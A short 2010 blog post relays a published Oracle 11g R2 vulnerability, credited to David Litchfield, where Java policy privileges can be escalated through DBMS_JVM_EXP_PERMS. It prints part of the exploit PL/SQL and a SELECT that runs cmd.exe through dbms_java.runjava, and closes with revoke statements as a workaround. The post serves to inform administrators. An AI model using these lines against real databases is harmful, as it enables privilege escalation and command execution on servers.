Oracle internals, debugging and undocumented features
Oracle Exploit Published 11g R2
February 5, 2010Posted by on
Just found this alert..
Credit goes to David Litchfield .He found these vulnerabilities .This also affects 11g R2.
Overgenerous privileges for Java procedures allow users to escalate their own privileges, up to the point of gaining complete control over the database.
Basically using DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS user can change their privileges in the Java policy table so that the JVM allows them to execute operating system commands and to read and write files.
Here is code:
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
FETCH C1 BULK COLLECT INTO POL;
After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:
select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;
Oracle does not have patch for it yet but you should revoke privileges from PUBLIC for following packages:
revoke execute on DBMS_JVM_EXP_PERMS from public;
revoke execute on DBMS_JAVA from public;
revoke execute on DBMS_JAVA_TEST from public;